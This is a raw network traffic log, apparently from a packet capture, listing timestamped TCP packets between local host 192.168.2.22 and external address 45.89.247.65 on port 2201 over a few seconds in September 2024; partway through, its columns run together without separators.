Sep 9, 2024 17:35:23.750684977 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:23.750695944 CEST | 49177 | 2201 | 192.168.2.22 | 45.89.247.65
Sep 9, 2024 17:35:23.750938892 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:23.755934000 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:23.755944014 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:23.755953074 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:23.755960941 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:23.755990028 CEST | 49177 | 2201 | 192.168.2.22 | 45.89.247.65
Sep 9, 2024 17:35:23.756175995 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:23.756185055 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:23.756192923 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:23.756201982 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:23.756208897 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:23.756217957 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:23.756225109 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:23.756232977 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:23.756242037 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:23.756248951 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:23.760796070 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.103652954 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.135539055 CEST | 49177 | 2201 | 192.168.2.22 | 45.89.247.65
Sep 9, 2024 17:35:24.140573978 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.140588999 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.140600920 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.140841007 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.140866041 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.141011000 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.183398008 CEST | 49175 | 2201 | 192.168.2.22 | 45.89.247.65
Sep 9, 2024 17:35:24.188380957 CEST | 2201 | 49175 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.363926888 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.399509907 CEST | 49176 | 2201 | 192.168.2.22 | 45.89.247.65
Sep 9, 2024 17:35:24.401101112 CEST | 49176 | 2201 | 192.168.2.22 | 45.89.247.65
Sep 9, 2024 17:35:24.407408953 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.407423019 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.407430887 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.407435894 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.407454014 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.407461882 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.407469988 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.407896996 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.407906055 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.407912970 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.407916069 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.412574053 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.412628889 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.412636995 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.412646055 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.412763119 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.412805080 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.412812948 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.413233042 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.413240910 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.413311005 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.735196114 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.771913052 CEST | 49177 | 2201 | 192.168.2.22 | 45.89.247.65
Sep 9, 2024 17:35:24.777215004 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.777255058 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.777287960 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.777314901 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.777342081 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:24.777369022 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.197684050 CEST | 49175 | 2201 | 192.168.2.22 | 45.89.247.65
Sep 9, 2024 17:35:25.205404997 CEST | 2201 | 49175 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.284982920 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.318133116 CEST | 49177 | 2201 | 192.168.2.22 | 45.89.247.65
Sep 9, 2024 17:35:25.323291063 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.323328972 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.323355913 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.323431969 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.323458910 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.323487043 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.379645109 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.405139923 CEST | 49176 | 2201 | 192.168.2.22 | 45.89.247.65
Sep 9, 2024 17:35:25.406373978 CEST | 49176 | 2201 | 192.168.2.22 | 45.89.247.65
Sep 9, 2024 17:35:25.410531998 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.410545111 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.410552979 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.410556078 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.410639048 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.410648108 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.410655975 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.410780907 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.410789967 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.410798073 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.410805941 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.410927057 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.410934925 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.410942078 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.411109924 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.415534019 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.415546894 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.415555954 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.415564060 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.415661097 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.415671110 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.918340921 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.943629026 CEST | 49177 | 2201 | 192.168.2.22 | 45.89.247.65
Sep 9, 2024 17:35:25.948831081 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.948843956 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.948906898 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.948957920 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.948983908 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:25.948992968 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.211525917 CEST | 49175 | 2201 | 192.168.2.22 | 45.89.247.65
Sep 9, 2024 17:35:26.216443062 CEST | 2201 | 49175 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.386687040 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.413758993 CEST | 49176 | 2201 | 192.168.2.22 | 45.89.247.65
Sep 9, 2024 17:35:26.415035009 CEST | 49176 | 2201 | 192.168.2.22 | 45.89.247.65
Sep 9, 2024 17:35:26.418854952 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.418872118 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.418888092 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.418899059 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.418997049 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.419136047 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.419147968 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.419157028 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.419173002 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.419358015 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.419428110 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.419435978 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.419445038 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.419449091 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.423835993 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.424020052 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.424030066 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.424037933 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.424117088 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.424134970 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.424367905 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.479418039 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.508347034 CEST | 49177 | 2201 | 192.168.2.22 | 45.89.247.65
Sep 9, 2024 17:35:26.513556957 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.513570070 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.513576984 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.513581038 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.513590097 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:26.513597965 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.047283888 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.080790043 CEST | 49177 | 2201 | 192.168.2.22 | 45.89.247.65
Sep 9, 2024 17:35:27.085763931 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.085777998 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.085788965 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.085939884 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.085959911 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.085968971 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.225487947 CEST | 49175 | 2201 | 192.168.2.22 | 45.89.247.65
Sep 9, 2024 17:35:27.230422974 CEST | 2201 | 49175 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.401369095 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.427711010 CEST | 49176 | 2201 | 192.168.2.22 | 45.89.247.65
Sep 9, 2024 17:35:27.428729057 CEST | 49176 | 2201 | 192.168.2.22 | 45.89.247.65
Sep 9, 2024 17:35:27.433037996 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.433052063 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.433074951 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.433084011 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.433106899 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.433115959 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.433125973 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.433149099 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.433156967 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.433167934 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.433284998 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.433295012 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.433365107 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.433373928 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.438690901 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.438703060 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.438705921 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.438709021 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.438976049 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.438982964 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.438992023 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.659425020 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.684209108 CEST | 49177 | 2201 | 192.168.2.22 | 45.89.247.65
Sep 9, 2024 17:35:27.689315081 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.689332008 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.689352989 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.689363003 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.689383984 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:27.689393997 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:28.239577055 CEST | 49175 | 2201 | 192.168.2.22 | 45.89.247.65
Sep 9, 2024 17:35:28.245313883 CEST | 2201 | 49175 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:28.325195074 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:28.350383043 CEST | 49177 | 2201 | 192.168.2.22 | 45.89.247.65
Sep 9, 2024 17:35:28.355781078 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:28.355823994 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:28.355878115 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:28.355906010 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:28.355932951 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:28.355958939 CEST | 2201 | 49177 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:28.416851044 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:28.447539091 CEST | 49176 | 2201 | 192.168.2.22 | 45.89.247.65
Sep 9, 2024 17:35:28.448672056 CEST | 49176 | 2201 | 192.168.2.22 | 45.89.247.65
Sep 9, 2024 17:35:28.452544928 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:28.452572107 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:28.452584982 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:28.452589035 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:28.452593088 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:28.452625990 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:28.452752113 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:28.452770948 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
Sep 9, 2024 17:35:28.452835083 CEST | 2201 | 49176 | 45.89.247.65 | 192.168.2.22
                                        Sep 9, 2024 17:35:28.452877998 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:28.452889919 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:28.452904940 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:28.452951908 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:28.452963114 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:28.457348108 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:28.457396030 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:28.457403898 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:28.457407951 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:28.457439899 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:28.457448959 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:28.457458019 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:28.996345997 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.021563053 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:29.026510954 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.026650906 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.026819944 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.027051926 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.027060032 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.027066946 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.253478050 CEST491752201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:29.258729935 CEST22014917545.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.439599037 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.472785950 CEST491762201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:29.473875999 CEST491762201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:29.477911949 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.477930069 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.477955103 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.477967024 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.477978945 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.478004932 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.478059053 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.478070974 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.478085041 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.478142023 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.482759953 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.482773066 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.482791901 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.482803106 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.482815027 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.482830048 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.482841969 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.482852936 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.482882977 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.482894897 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.482906103 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.534281015 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.561973095 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:29.567035913 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.567053080 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.567120075 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.567193031 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.567219973 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:29.567233086 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.144474983 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.179378986 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:30.185067892 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.185105085 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.185158968 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.185185909 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.185213089 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.185240984 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.267421961 CEST491752201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:30.273152113 CEST22014917545.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.441756010 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.466280937 CEST491762201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:30.467211008 CEST491762201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:30.471343994 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.471406937 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.471489906 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.471518993 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.471546888 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.471580029 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.471606970 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.471709013 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.471740007 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.471767902 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.471822023 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.471848965 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.471879005 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.471905947 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.476103067 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.476130962 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.476180077 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.476207018 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.476233959 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.476259947 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.476285934 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.822494984 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.857770920 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:30.862771988 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.862790108 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.862802029 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.862824917 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.862837076 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:30.862848997 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:31.281467915 CEST491752201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:31.286565065 CEST22014917545.89.247.65192.168.2.22
